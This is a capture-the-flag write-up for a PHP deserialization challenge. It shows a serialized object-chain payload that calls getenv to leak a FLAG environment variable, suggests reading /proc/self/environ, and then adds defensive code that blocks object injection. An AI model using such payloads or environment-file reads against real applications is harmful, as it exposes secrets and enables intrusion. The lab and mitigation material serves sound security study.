Web-19-1 | Chapter 19_revenge
Ramblings
Deserialization 4.0
Writeup
The challenge bans system, so we switch to another way of reading the environment variable:
```php
<?php
class PersonA {
    public $name;
    public $id;
    public $age;
}
class PersonC {
    public $name;
    public $id;
    public $age;
}
$pc = new PersonC();
$pc->name = 'getenv';
$pc->age = "";
$pa = new PersonA();
$pa->name = $pc;
$pa->id = 'Check';
$pa->age = 'FLAG';
echo urlencode(serialize($pa));
?>
```
P.S. You can also use file_get_contents('/proc/self/environ')

This gives the flag: moectf{7d2a95e7-9ec5-643a-c416-a7b9e15c0403}
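From the defender's side, the nested PersonA → PersonC object chain above only works because the endpoint turns attacker-supplied serialized data back into live objects. The following is an added example, not code from the challenge or from this writeup: `load_untrusted` and `object_classes` are hypothetical helper names, and the sample inputs are constructed. It decodes with `allowed_classes` disabled so that no user class is instantiated, then rejects any input that contains objects at all.

```php
<?php
// Class names mirror the writeup; the helpers below are assumptions for illustration.
class PersonA { public $name; public $id; public $age; }
class PersonC { public $name; public $id; public $age; }

/** Collect the class name of every object found in an inert decode. */
function object_classes($value, array &$found = []): array {
    if ($value instanceof __PHP_Incomplete_Class) {
        // Casting to array exposes the properties without touching the object.
        $props = (array) $value;
        $found[] = $props['__PHP_Incomplete_Class_Name'];
        unset($props['__PHP_Incomplete_Class_Name']);
        $value = $props;
    }
    if (is_array($value)) {
        foreach ($value as $v) {
            object_classes($v, $found);
        }
    }
    return $found;
}

function load_untrusted(string $wire) {
    // allowed_classes=false: every object becomes __PHP_Incomplete_Class,
    // so no user-defined magic method can run during or after decoding.
    $data = @unserialize($wire, ['allowed_classes' => false]);
    if ($data === false && $wire !== serialize(false)) {
        throw new InvalidArgumentException('malformed serialized data');
    }
    $classes = object_classes($data);
    if ($classes) {
        throw new InvalidArgumentException('objects rejected: ' . implode(', ', $classes));
    }
    return $data;
}

// Constructed input with the same nesting as the payload above.
$pc = new PersonC(); $pc->name = 'getenv'; $pc->age = '';
$pa = new PersonA(); $pa->name = $pc; $pa->id = 'Check'; $pa->age = 'FLAG';

try {
    load_untrusted(serialize($pa));
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
// Plain scalar/array data (constructed) still decodes normally.
var_dump(load_untrusted(serialize(['id' => 'Check', 'age' => 18])));
```

Where the application controls both ends, replacing `unserialize` with `json_decode` removes the object-injection surface entirely.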